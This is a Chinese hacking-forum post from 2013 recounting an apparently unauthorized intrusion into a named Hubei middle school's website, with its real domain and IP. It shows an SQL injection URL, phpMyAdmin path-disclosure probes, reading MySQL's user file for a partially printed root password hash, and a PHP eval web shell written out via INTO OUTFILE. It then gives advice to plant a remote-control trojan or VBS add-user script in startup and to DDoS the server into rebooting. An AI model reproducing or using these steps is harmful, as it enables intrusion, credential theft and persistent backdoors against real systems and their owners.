找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2733|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
& f, l/ q4 `- }* A* X, w( P0 B3 `. a发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
; `9 P* d- n7 x* G6 Q/ M
2 _8 ]& D" h& Q
4 P* R% V5 r( G9 T* \! H) d* g" S3 T. q$ M. T/ H& R
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限   i- |* u  r  I

8 K6 ~' c3 @0 \1 r8 R) ?; P5 V那么想可以直接写入shell ,getshell有几个条件:7 }( d+ X* ~' C( u2 X
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
  J' k; ~8 [8 R/ {
% F9 P, M5 M) p' N4 E+ b$ e$ J试着爆绝对路径:
# g; r5 K; [* a, O1./phpMyAdmin/index.php?lang[]=1  * O. C! u" a$ K2 L  m
2./phpMyAdmin/phpinfo.php  . j  b* Q8 Z: L3 \$ R
3./load_file()  
6 O9 g) m7 ^2 R0 n4./phpmyadmin/themes/darkblue_orange/layout.inc.php  $ x  D6 R  I( m' ]3 |
5./phpmyadmin/libraries/select_lang.lib.php  " Q; y6 D7 _& x9 L/ `; m
6./phpmyadmin/libraries/lect_lang.lib.php  
1 \( x2 H( p, @# p# D9 k7./phpmyadmin/libraries/mcrypt.lib.php   
. u8 Y! k, q  o, [. D" u% f$ o8./phpmyadmin/libraries/export/xls.php  
4 S$ I9 J! v4 R. O  q/ X
( \5 c! c3 A  d5 a; C7 S; f均不行...........................' e( ^: e$ O8 c# L! h

; }8 K' b0 x0 O御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php1 T5 _5 G0 W8 |' s  [
. Y+ U* c' L. |& k/ w9 k* o
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 2 P6 v9 P, ~  E- L  e

1 h8 R7 f4 d9 u+ f默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
8 _" r6 [) M0 e' g% Z$ G9 t6 g; m# |' Y4 Y) [
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
9 i$ Q5 @* I- b2 [9 Q* k; T" j3 @: W
% ]* N' b+ n1 i- f想想root还可以读,读到root密码进phpmyadmin 也可以拿shell , P; |6 s& h$ ]# i

4 s8 v. M# X6 i2 B1 t' S: ]+ chttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini 8 t5 j7 _; P9 i7 C! R; F) [
8 r+ X& D1 V( C( u
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
5 s, J* m, f. i4 _9 C) L( _7 i
& c% o/ [9 k( ?! N成功读到root密码:
  Y  ?& y8 }( \* Z. E; F3 F' J0 }) C8 `7 t5 p4 v7 d3 Q
17---- r(0072)
( g& v4 f: z" u3 ^- c, ^9 C18---- o(006f)4 u  L( c: Y3 |1 n6 F  F5 I
19---- o(006f)
- W2 [. C; s& E  C' q20---- t(0074)
: K2 `- R7 e. @6 U21---- *(002a)5 C3 Z9 N9 n0 O$ ^' T1 o" C6 W$ c$ O
22---- 8(0038)- D, }" _6 @& C8 j
23---- 2(0032)
2 H1 X6 a: D+ e* w" E$ x/ A24---- E(0045)
$ `& n. `9 i( W25---- 1(0031)8 x. f' Z9 Z; |& I! m9 x
26---- C(0043)% R# C5 Y- V: E8 Z
27---- 5(0035)
* e$ H' j: h7 T1 Q: l28---- 8(0038)* R5 @- E3 U  P% t/ Z
29---- 2(0032)
( I' X- q6 @1 G. {2 h7 K3 `" ]30---- 8(0038)0 e' H' M) Z) v& D" z) q
31---- A(0041)
$ \% ~- @$ a, C4 @5 ?8 F4 n32---- 9(0039)
7 P5 u; v) O+ j0 x  x33---- B(0042)
; a! `; ~8 |' D* H34---- 5(0035)- w3 L# a) d/ S
35---- 4(0034)
8 ^9 u  {8 q6 E8 C2 S36---- 8(0038)5 S* ?4 m  k) n4 d" R
37---- 6(0036)/ \2 W3 L1 E6 G+ [' ~
38---- 4(0034)' D6 ]# u2 H) O4 B/ k8 a
39---- 9(0039)
% a' O1 g4 r1 H4 y40---- 1(0031)
1 F: O) \5 a4 p9 S41---- 1(0031)
# \5 s" }5 _; B. T42---- 5(0035)
' d$ b) M( q) E7 w43---- 3(0033)1 ?/ Q& k: L+ B5 v( q! M% c+ E
44---- 5(0035)& _: ?' c: Y: |
45---- 9(0039)% V! |# Z/ Q; d0 I
46---- 8(0038)
5 t8 u6 n& P5 t- Y, @47---- F(0046)
, X- _; }6 C$ n7 w( l& t" {48---- F(0046)" V, k5 [, y9 D  L: u, }
49---- 4(0034)
( O2 D( q' F  R' `6 k2 t# b  b50---- F(0046); P5 M0 H# a% ~" ]
51---- 0(0030)1 ]( \0 o& a: U2 N
52---- 3(0033)
" _+ J$ I5 v" U. k53---- 2(0032)
2 x+ X& R2 W+ I) d2 R54---- A(0041)1 A0 q+ Y6 x' U& c" P
55---- 4(0034)
9 e) B( f( W( a. _56---- A(0041)
% E' ^4 v+ Q7 V57---- B(0042)" v3 R/ t! U: X1 O, @( p
58---- *(0044)) t/ t8 ]6 }+ |! K! o2 l( t
59---- *(0035)
1 f. }" F' n2 ]+ x( Y+ y60---- *(0041)" S( B& v, c- I$ m3 k' }0 N
61---- *0032)/ P0 U3 Z8 J$ O# @
- g$ v7 d, J1 I9 U; w
解密后成功登陆phpmyamin
1 w' I+ }$ U  X                          
) z, i" L7 G6 i1 L# Q
% d. {- H2 h2 b" U                               Z- b& k7 O$ A/ J
( d& g5 w2 Z9 ~
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'1 s5 U/ a9 U9 k# K1 P
7 p6 O" ~3 F# s5 C1 H
成功执行,拿下shell,菜刀连接:0 c) d* E/ a8 p  |( T

2 S1 x% O' o" x3 d0 i2 y# C服务器不支持asp,aspx,php提权无果...................3 P$ c5 \* {$ ^% \9 A3 F! B
. `: u" _; g  n$ j" J0 D% C8 g
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:; z; S! H2 K9 L* {3 x5 i% {. t
服务器上已经有个隐藏帐号了

, o' Q6 f! e# b$ o9 D3 N
别名     administrators% p( s& Y% `0 s# `
注释     管理员对计算机/域有不受限制的完全访问权
$ c" i6 \, ~1 P
成员

) Q2 G: O5 o( e# Q8 k4 x8 F* \$ ^
-------------------------------------------------------------------------------
; [, K9 x1 G% C* wadmin
8 V& @+ E( Y, M& G( W! VAdministrator' _  j" I8 [( G- t' X+ ?' L
slipper$
$ b# w* ~0 s* ~sqluser5 N3 D% w9 z4 ^
命令成功完成。
5 z* X2 z: [  G$ y1 Q% F6 ^7 {  P9 _5 O
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。0 Z# d) z9 B" @; O5 _0 E
, j3 l2 X+ n, V! ~
ddos服务器重启,不然就只能坐等服务器重启了...............................
8 @4 l! k" \5 V7 F9 `* u1 S
$ O1 a8 n! q# G, s      
6 v( n8 ?6 u2 s" x9 r! U! W) d

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表